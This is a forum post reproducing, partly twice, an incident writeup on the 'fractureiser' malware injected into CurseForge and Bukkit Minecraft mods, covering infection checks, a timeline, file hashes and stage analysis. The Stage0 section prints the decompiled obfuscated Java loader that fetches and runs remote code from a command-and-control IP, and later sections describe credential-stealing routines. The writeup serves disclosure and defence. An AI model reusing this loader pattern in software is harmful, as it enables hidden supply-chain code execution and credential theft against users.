- Joined
- Sep 28, 2022
Curseforge, a popular site for minecraft mods has been compromised. Multiple modpacks and mods have been modified to include malicious code from a third party.
It seems this compromise happened weeks ago, files from as far back as the 20th may April have been confirmed to be backdoored.
Details here
We’ve dubbed this malware fractureiser because that’s the name of the CurseForge account that uploaded the most notable malicious files. Other suggested names are neko.run and fractureneko.
Investigation has slowed down as we believe we’ve learned all we can with what we have currently. We have picked apart Stage0 and Stage1, taken down the C&C, and have potential Stage2 and Stage3 files with little interesting info in them. If you are infected, please give us a copy of the libWebGL64.jar (Stage2) file if you still have it. We’re focusing on cleaning up this writeup and getting everything we know written down.
If you have files relevant to this malware, please upload them to https://wormhole.app and email the URL to fractureiser.investigation@opayq.com — this inbox is controlled by xylemlandmark, and anything sent to it will be shared with the rest of the team. Please also let us know if you have the ability to download files from VirusTotal, as that would let us get ahold of many of the files we’re missing.
If you copy portions of this document elsewhere, please put a prominent link back to this HackMD page somewhere near the top so that people can read the latest updates and get in contact.
A number of Curseforge and dev.bukkit.org (not the Bukkit software itself) accounts have been compromised, and malicious software was injected into copies of many popular plugins and mods. Some of these malicious copies have been injected into popular modpacks including Better Minecraft. There are reports of malicious plugin/mod JARs as early as May 22nd.
Until further notice, do not use the official Curseforge launcher, or download anything from Curseforge or the Bukkit plugin repository. While the control server for this malware is currently offline, any download from Curseforge or the Bukkit plugin repository in the last 2-3 weeks should be treated as potentially malicious. This malware is unlikely to be detected by Windows Defender or similar antimalware products.
If you have downloaded any mods from Curseforge, or plugins from Bukkit, even through clients such as Prism Launcher or the official Curseforge launcher, it is recommended that you follow the “Am I infected?” guide below.
The affected accounts had two-factor authentication enabled. It’s unlikely this is a simple password compromise situation; it may be auth token compromise or something bigger on the CF side. Multiple accounts are affected so we don’t believe this is isolated.
Currently, we do not suspect other platforms such as Modrinth to be affected.
Right now, the malware is dormant due to the loss of its C&C server and the Stage0 (what was distributed via mods and modpacks) not having a way to get a new server. We still do not know how the compromise occurred, we are waiting for a response from Curseforge. If you were infected with Stage2 (the file described below, dropped by Stage1 when C&C was up), then the malware is still active.
Before downloading, the malware will create the enclosing directory if it does not exist. Windows/MS Edge does not use the “Microsoft Edge”-with-a-space directory, and Linux software does not use ~/.config/.data, so these folders existing is a likely sign that Stage1 has executed on a victim computer.
If Stage2 successfully downloads, it will attempt to make itself start on boot by modifying the Windows registry, or dropping a systemd unit into /etc/systemd. (The Linux side of this payload is unlikely to work as it requires root privileges.)
Emi’s shell script here simply checks for all usages of ClassLoader, which is uncommon in mod code. This can lead to false positives and negatives. For example, it falsely flags the latest Quark 1.19 file as infected when it is not.
Sylv’s shell script here does a bit more fingerprint matching for the malware, and should be more precise.
As a non-technical user, your best course of action is to check if your system was affected using the above steps, removing all mods that were downloaded in the last several weeks, and refraining from downloading anything from CurseForge or dev.bukkit.org until further notice.
2023-06-07 6:27 UTC
Investigation has slowed down and most of the team is going to bed. xylemlandmark has opened an email inbox for people to submit samples or other useful information. williewillus is currently working to clean up and get the information presented by Shadowex3 into this doc.
2023-06-07 6:20 UTC
Shadowex3 informs the unofficial Discord that they have a copy of the full (untruncated) Stage 3 client.jar, as well as an in-depth analysis of what the malware is doing.
2023-06-07 5:27 UTC
We’ve discovered a potential Stage 3 file; it is heavily obfuscated and contains a native payload DLL that attempts to steal credentials from the Windows credentials store.
2023-06-07 4:57 UTC
Files uploaded in April have been discovered; either the dates are being spoofed, or this has been going on even longer. Many of the accounts have Last Active times in 1999 — likely a quirk with old CurseForge accounts, but still notable.
Modrinth staff are investigating if any uploads on there are compromised. A quick pass they did through recently updated projects looked OK.
2023-06-07 4:40 UTC
The scope of this compromise seems larger than initially realized. The malicious files go back multiple weeks, as early as May 20th. We only noticed today because they compromised a popular modpack.
2023-06-07 3:38 UTC
The C&C server has been taken down by the server provider. A new one will likely come up if the Cloudflare page stays up, we’re monitoring it.
2023-06-07 3:26 UTC
We were sent a possible Stage 2 jar by an anonymous user that claims to work at a server host.
2023-06-07 2:26 UTC
The #cfmalware EsperNet channel is created to coordinate discussion that had been happening in multiple Discord guilds and Matrix spaces.
2023-06-07 0:40 UTC
The team behind this document learns of the malicious files included in an unauthorized update to Better Minecraft.
We cannot tell if the malicious mods were always malicious, or if they got edited. They have upload dates multiple weeks in the past. A CDN compromise or cache poisoning attack is not out of the question due to Curse’s usage of the extremely outdated and insecure MD5 to verify downloads.
Darkhax sent this: https://gist.github.com/Darkhax/d7f6d1b5bfb51c3c74d3bd1609cab51f
potentially more: Sophisticated Core, Dramatic Doors, Moonlight lib, Union lib
The method’s code is obfuscated, using new String(new byte[]{...}) instead of string literals.
From Shadowex3’s sample of “Create Infernal Expansion Plus”, a copycat version of “Create Infernal Expansion Compat” with malware inserted into the main mod class:
static void _1685f49242dd46ef9c553d8af1a4e0bb() {
Class.forName(new String(new byte[] {
// "Utility"
85, 116, 105, 108, 105, 116, 121
}), true, (ClassLoader) Class.forName(new String(new byte[] {
// "java.net.URLClassLoader"
106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114
})).getConstructor(URL[].class).newInstance(new URL[] {
new URL(new String(new byte[] {
// "http"
104, 116, 116, 112
}), new String(new byte[] {
56, 53, 46, 50, 49, 55, 46, 49, 52, 52, 46, 49, 51, 48
}), 8080, new String(new byte[] {
// "/dl"
47, 100, 108
}))
})).getMethod(new String(new byte[] {
// "run"
114, 117, 110
}), String.class).invoke((Object) null, "-114.-18.38.108.-100");
}
This:
The creation of the classloader is hardcoded to that URL and does not use the Cloudflare URL that Stage 1 does. As that IP is now offline, this means the Stage 0 payloads we are presently aware of no longer function.
Decompiled copy of Utility from the malware.
The very first thing Utility.run does is check if the system property neko.run is set. If it is, it will immediately stop executing. If not, it sets it to the empty string and continues. This appears to be a very simplistic way of avoiding the same process running the malware multiple times, such as if it had multiple infected mods.
It attempts to contact 85.217.144.130, and a Cloudflare Pages domain (https://[files-8ie.pages.dev]/ip). Yes, people have already reported abuse.The Pages domain is used to retrieve the IP of the C&C server if the first IP no longer responds. Due to a bug in the fallback, the Cloudflare page is never actually contacted. This means the version of Stage1 we are presently aware of is completely dead.
The C&C IP has been nullrouted after an abuse report to the server provider. We will need to keep an eye on the Cloudflare page to see if a new C&C server is stood up, I can’t imagine they didn’t plan for this. Thank you Serverion for your prompt response.
It attempts to drop itself into the paths listed above and will attempt to infect Linux. Through these paths it hopes to establish persistence so that when Stage2 is/was ready, it could then be downloaded and run. Rumor has it there’s a way for it to privilege escalate, but that seems unlikely and is unconfirmed. It is likely trying to compromise misconfigured systems.
Compromised mods have a static initializer block in their main class that bootstraps this stage. This isn’t some off-the-shelf malware that’s been uploaded to Curse (that’s been done before, and isn’t useful because mod loaders don’t run a JAR’s Main-Class), it’s actual malicious versions of mods with code injected, potentially automatically.
Partial reverse engineering of lib.jar (unmangled with https://github.com/java-deobfuscator/deobfuscator) gives https://gist.github.com/jaskarth/51196424dc0637cad8e7f275497b8da8 (Note: The decompiled obfuscated malicious code is very likely to be incomplete. This is useful for a broad overview of what the code may be doing, but isn’t representative of its full capabilities.)
References something called “Neko Client”, which might be a botnet.
Deobfuscated strings:
It appears to contain a native payload hook.dll, decompiled: https://gist.githubusercontent.com/...f5ff74275ac44c2200d5121bfff652fd49/hook.dll.c
From preliminary analysis, it appears to be attempting to steal Microsoft account credentials from the Windows credential store.
There are two native functions meant to be called from Java, as they are JNI callable:
is was (got taken down) hosted on Serverion, a company based in the Netherlands.
Other than an HTTP server on port 80/443 and an SSH server on port 22 (don’t try to attack this, attacking SSH is a fools’ errand), the following ports were open on 85.217.144.130:
If you downloaded anything from curseforge in the last month check these locations for these files, if you find em, delete them
Right now the C&C server is down and its unknown what the malware does after infection, most likely a botnet or something.
It seems this compromise happened weeks ago, files from as far back as
Details here
The CF Malware “fractureiser” - What We Know
The only official channel run by the same team that wrote this writeup is #cfmalware on EsperNet IRC — we do not have a Discord. You may join the channel if you wish — due to an influx of new users we’ve set the channel +m, you will need permission to speak. Joining an IRC channel will expose your IP address.We’ve dubbed this malware fractureiser because that’s the name of the CurseForge account that uploaded the most notable malicious files. Other suggested names are neko.run and fractureneko.
Investigation has slowed down as we believe we’ve learned all we can with what we have currently. We have picked apart Stage0 and Stage1, taken down the C&C, and have potential Stage2 and Stage3 files with little interesting info in them. If you are infected, please give us a copy of the libWebGL64.jar (Stage2) file if you still have it. We’re focusing on cleaning up this writeup and getting everything we know written down.
If you have files relevant to this malware, please upload them to https://wormhole.app and email the URL to fractureiser.investigation@opayq.com — this inbox is controlled by xylemlandmark, and anything sent to it will be shared with the rest of the team. Please also let us know if you have the ability to download files from VirusTotal, as that would let us get ahold of many of the files we’re missing.
If you copy portions of this document elsewhere, please put a prominent link back to this HackMD page somewhere near the top so that people can read the latest updates and get in contact.
Non-technical overview [READ ME!]
Notice: Plugins with similar malware have been found as early as mid-April.A number of Curseforge and dev.bukkit.org (not the Bukkit software itself) accounts have been compromised, and malicious software was injected into copies of many popular plugins and mods. Some of these malicious copies have been injected into popular modpacks including Better Minecraft. There are reports of malicious plugin/mod JARs as early as May 22nd.
Until further notice, do not use the official Curseforge launcher, or download anything from Curseforge or the Bukkit plugin repository. While the control server for this malware is currently offline, any download from Curseforge or the Bukkit plugin repository in the last 2-3 weeks should be treated as potentially malicious. This malware is unlikely to be detected by Windows Defender or similar antimalware products.
If you have downloaded any mods from Curseforge, or plugins from Bukkit, even through clients such as Prism Launcher or the official Curseforge launcher, it is recommended that you follow the “Am I infected?” guide below.
The affected accounts had two-factor authentication enabled. It’s unlikely this is a simple password compromise situation; it may be auth token compromise or something bigger on the CF side. Multiple accounts are affected so we don’t believe this is isolated.
Currently, we do not suspect other platforms such as Modrinth to be affected.
What’s at stake?
If you got infected while the C&C server was still up, you may have had your browser database and Windows credential store dumped. This includes your Windows Microsoft account, vanilla Minecraft launcher account, and god knows what else. The jar file that does these things is unconfirmed but we believe it is related to this outbreak.Right now, the malware is dormant due to the loss of its C&C server and the Stage0 (what was distributed via mods and modpacks) not having a way to get a new server. We still do not know how the compromise occurred, we are waiting for a response from Curseforge. If you were infected with Stage2 (the file described below, dropped by Stage1 when C&C was up), then the malware is still active.
Am I infected?
You can check whether the malware ever ran on your computer, since Stage1 attempts to create files at several unusual paths:- Linux: ~/.config/.data/lib.jar
- Windows: %LOCALAPPDATA%\Microsoft Edge\libWebGL64.jar (or ~\AppData\Local\Microsoft Edge\libWebGL64.jar)
- Make sure to show hidden files when checking
- Yes, “Microsoft Edge” with a space. MicrosoftEdge is the legitimate directory used by actual Edge.
- Also check the registry for an entry at HKEY_CURRENT_USER
![:\](/styles/custom/emotes/svg/chris-confused.svg "Confused :\")
Software\Microsoft\Windows\CurrentVersion\Run - Or a shortcut in %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
- All other OSes: Unaffected. The malware is hardcoded for Windows and Linux only. It is possible it will receive an update adding payloads for other OSes in the future.
Before downloading, the malware will create the enclosing directory if it does not exist. Windows/MS Edge does not use the “Microsoft Edge”-with-a-space directory, and Linux software does not use ~/.config/.data, so these folders existing is a likely sign that Stage1 has executed on a victim computer.
If Stage2 successfully downloads, it will attempt to make itself start on boot by modifying the Windows registry, or dropping a systemd unit into /etc/systemd. (The Linux side of this payload is unlikely to work as it requires root privileges.)
Given a jar file, how do I know if it’s safe?
There are various heuristics you can use to determine whether a jar is infected with Stage0.Emi’s shell script here simply checks for all usages of ClassLoader, which is uncommon in mod code. This can lead to false positives and negatives. For example, it falsely flags the latest Quark 1.19 file as infected when it is not.
Sylv’s shell script here does a bit more fingerprint matching for the malware, and should be more precise.
As a non-technical user, your best course of action is to check if your system was affected using the above steps, removing all mods that were downloaded in the last several weeks, and refraining from downloading anything from CurseForge or dev.bukkit.org until further notice.
Timeline
2023-06-07 6:27 UTC
Investigation has slowed down and most of the team is going to bed. xylemlandmark has opened an email inbox for people to submit samples or other useful information. williewillus is currently working to clean up and get the information presented by Shadowex3 into this doc.
2023-06-07 6:20 UTC
Shadowex3 informs the unofficial Discord that they have a copy of the full (untruncated) Stage 3 client.jar, as well as an in-depth analysis of what the malware is doing.
2023-06-07 5:27 UTC
We’ve discovered a potential Stage 3 file; it is heavily obfuscated and contains a native payload DLL that attempts to steal credentials from the Windows credentials store.
2023-06-07 4:57 UTC
Files uploaded in April have been discovered; either the dates are being spoofed, or this has been going on even longer. Many of the accounts have Last Active times in 1999 — likely a quirk with old CurseForge accounts, but still notable.
Modrinth staff are investigating if any uploads on there are compromised. A quick pass they did through recently updated projects looked OK.
2023-06-07 4:40 UTC
The scope of this compromise seems larger than initially realized. The malicious files go back multiple weeks, as early as May 20th. We only noticed today because they compromised a popular modpack.
2023-06-07 3:38 UTC
The C&C server has been taken down by the server provider. A new one will likely come up if the Cloudflare page stays up, we’re monitoring it.
2023-06-07 3:26 UTC
We were sent a possible Stage 2 jar by an anonymous user that claims to work at a server host.
2023-06-07 2:26 UTC
The #cfmalware EsperNet channel is created to coordinate discussion that had been happening in multiple Discord guilds and Matrix spaces.
2023-06-07 0:40 UTC
The team behind this document learns of the malicious files included in an unauthorized update to Better Minecraft.
Technical info
Distribution
Some modpacks have had updates published for them without the knowledge of the authors, adding a dependency on malicious mods. These modpack updates were archived immediately after uploading, meaning they do not show on the web UI, only via the API.We cannot tell if the malicious mods were always malicious, or if they got edited. They have upload dates multiple weeks in the past. A CDN compromise or cache poisoning attack is not out of the question due to Curse’s usage of the extremely outdated and insecure MD5 to verify downloads.
Known affected mods & plugins
At this point, we have enough samples to know this is quite widespread. Documenting more is likely a waste of time. Just consider all mods and plugins downloaded from CurseForge and BukkitDev to be compromised.| mod/plugin | link | SHA1 | “Uploader” |
|---|---|---|---|
| Skyblock Core | [www.curseforge.com]/minecraft/mc-mods/skyblock-core/files/4570565 | 33677CA0E4C565B1F34BAA74A79C09A3B690BF41 | Luna Pixel Studios |
| Dungeonz | [legacy.curseforge.com]/minecraft/mc-mods/dungeonx/files/4551100 | 2DB855A7F40C015F8C9CA7CBAB69E1F1AAFA210B | fractureiser |
| Haven Elytra | [dev.bukkit.org]/projects/havenelytra/files/4551105 [legacy.curseforge.com]/minecraft/bukkit-plugins/havenelytra/files/4551105 | 284A4449E58868036B2BAFDFB5A210FD0480EF4A | fractureiser |
| Vault Integrations | [www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590 | 0C6576BDC6D1B92D581C18F3A150905AD97FA080 | simpleharvesting82 |
| AutoBroadcast | [www.curseforge.com]/minecraft/mc-mods/autobroadcast/files/4567257 | C55C3E9D6A4355F36B0710AB189D5131A290DF26 | shyandlostboy81 |
| Museum Curator Advanced | [www.curseforge.com]/minecraft/mc-mods/museum-curator-advanced/files/4553353 | 32536577D5BB074ABD493AD98DC12CCC86F30172 | racefd16 |
| Vault Integrations Bug fix | [www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590 | 0C6576BDC6D1B92D581C18F3A150905AD97FA080 | simplyharvesting82 |
| Floating Damage | [dev.bukkit.org]/projects/floating-damage | 1d1aaccdc13244e980c0c024610ecc77ea2674a33a52129edf1bb4ce3b2cc2fc | mamavergas3001 |
| Display Entity Editor | [www.curseforge.com]/minecraft/bukkit-plugins/display-entity-editor/files/4570122 | A4B6385D1140C111549D95EAB25CB51922EEFBA2 | santa_faust_2120 |
potentially more: Sophisticated Core, Dramatic Doors, Moonlight lib, Union lib
Stage0 (Infected mod jars)
Affected mods have a new static void method inserted into their main class, and a call to this method is inserted into that class’s static initializer. For DungeonZ, the method is named _d1385bd3c36f464882460aa4f0484c53 and exists in net.dungeonz.DungeonzMain. For Skyblock Core, the method is named _f7dba6a3a72049a78a308a774a847180 and is inserted into com.bmc.coremod.BMCSkyblockCore. For HavenElytra, the code is inserted directly into the otherwise-unused static initializer of valorless.havenelytra.HavenElytra.The method’s code is obfuscated, using new String(new byte[]{...}) instead of string literals.
From Shadowex3’s sample of “Create Infernal Expansion Plus”, a copycat version of “Create Infernal Expansion Compat” with malware inserted into the main mod class:
static void _1685f49242dd46ef9c553d8af1a4e0bb() {
Class.forName(new String(new byte[] {
// "Utility"
85, 116, 105, 108, 105, 116, 121
}), true, (ClassLoader) Class.forName(new String(new byte[] {
// "java.net.URLClassLoader"
106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114
})).getConstructor(URL[].class).newInstance(new URL[] {
new URL(new String(new byte[] {
// "http"
104, 116, 116, 112
}), new String(new byte[] {
56, 53, 46, 50, 49, 55, 46, 49, 52, 52, 46, 49, 51, 48
}), 8080, new String(new byte[] {
// "/dl"
47, 100, 108
}))
})).getMethod(new String(new byte[] {
// "run"
114, 117, 110
}), String.class).invoke((Object) null, "-114.-18.38.108.-100");
}
This:
- Create a URLClassLoader with the URL http://[85.217.144.130:8080]/dl
- Loads and calls Utility.run with a String argument using that classloader (fetching code from the internet), argument is different for each infected mod (!)
- Skyblock Core: “-74.-10.78.-106.12”
- Dungeonz: “114.-18.38.108.-100”
- HavenElytra: “-114.-18.38.108.-100”
- Vault Integrations: “-114.-18.38.108.-100”
The creation of the classloader is hardcoded to that URL and does not use the Cloudflare URL that Stage 1 does. As that IP is now offline, this means the Stage 0 payloads we are presently aware of no longer function.
Stage1 (dl.jar)
SHA-1: dc43c4685c3f47808ac207d1667cc1eb915b2d82Decompiled copy of Utility from the malware.
The very first thing Utility.run does is check if the system property neko.run is set. If it is, it will immediately stop executing. If not, it sets it to the empty string and continues. This appears to be a very simplistic way of avoiding the same process running the malware multiple times, such as if it had multiple infected mods.
It attempts to contact 85.217.144.130, and a Cloudflare Pages domain (https://[files-8ie.pages.dev]/ip). Yes, people have already reported abuse.
The C&C IP has been nullrouted after an abuse report to the server provider. We will need to keep an eye on the Cloudflare page to see if a new C&C server is stood up, I can’t imagine they didn’t plan for this. Thank you Serverion for your prompt response.
It attempts to drop itself into the paths listed above and will attempt to infect Linux. Through these paths it hopes to establish persistence so that when Stage2 is/was ready, it could then be downloaded and run. Rumor has it there’s a way for it to privilege escalate, but that seems unlikely and is unconfirmed. It is likely trying to compromise misconfigured systems.
Compromised mods have a static initializer block in their main class that bootstraps this stage. This isn’t some off-the-shelf malware that’s been uploaded to Curse (that’s been done before, and isn’t useful because mod loaders don’t run a JAR’s Main-Class), it’s actual malicious versions of mods with code injected, potentially automatically.
Stage2 (“lib.jar” or “libWebGL64.jar”)
Stage1 connects to port 8083 on the C&C server (85.217.144.130) and sends the host’s IP as a knock, and every time we’ve attempted to get the payload there’s no response. This could indicate a few things:- The stage 2 does not exist yet, and it will be dropped at a later date to curb exactly this kind of effort.
Existing sockets will get the payload streamed to them and it will get ran.Now that the first C&C is down, this can’t happen. - Stage 2 already existed, and the server was taken offline to prevent reverse engineering.
- This is a targeted attack, and only certain IPs will get the payload sent to them.
Unconfirmed lib.jar (“Neko Client”) findings
Someone who works at a hosting company has sent us a lib.jar (Stage 2) that seems legit.Partial reverse engineering of lib.jar (unmangled with https://github.com/java-deobfuscator/deobfuscator) gives https://gist.github.com/jaskarth/51196424dc0637cad8e7f275497b8da8 (Note: The decompiled obfuscated malicious code is very likely to be incomplete. This is useful for a broad overview of what the code may be doing, but isn’t representative of its full capabilities.)
References something called “Neko Client”, which might be a botnet.
Deobfuscated strings:
- (an allatori demo watermark, identical to the one in the zip comment)
- dev.neko.nekoclient.Client (is used in a Class.forName)
- start (appears to be a method name, used for reflection)
Stage3 (unconfirmed “client.jar”)
The client (2).jar we have our hands on is malformed (seemingly truncated), but can be “fixed” as follows: zip -FF client.jar --out clientfixed.jar then decompiled.It appears to contain a native payload hook.dll, decompiled: https://gist.githubusercontent.com/...f5ff74275ac44c2200d5121bfff652fd49/hook.dll.c
From preliminary analysis, it appears to be attempting to steal Microsoft account credentials from the Windows credential store.
There are two native functions meant to be called from Java, as they are JNI callable:
- __int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveClipboardFiles(__int64 a1);
- __int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveMSACredentials(__int64 a1);
Other Stuff
The main payload serverOther than an HTTP server on port 80/443 and an SSH server on port 22 (don’t try to attack this, attacking SSH is a fools’ errand), the following ports were open on 85.217.144.130:
- 1337
- 1338 (a port referenced in stage 1’s file for creating new Debugger connection)
- 8081 (this is a WebSocket server - no apparent function right now, not referenced in any malicious code)
- 8082 (nobody’s gotten anything out of this one, not referenced in any malicious code)
- 8083 (contacted by stage 1)
- Linux: ~/.config/.data/lib.jar
- Windows: %LOCALAPPDATA%\Microsoft Edge\libWebGL64.jar (or ~\AppData\Local\Microsoft Edge\libWebGL64.jar)
Right now the C&C server is down and its unknown what the malware does after infection, most likely a botnet or something.
Last edited:
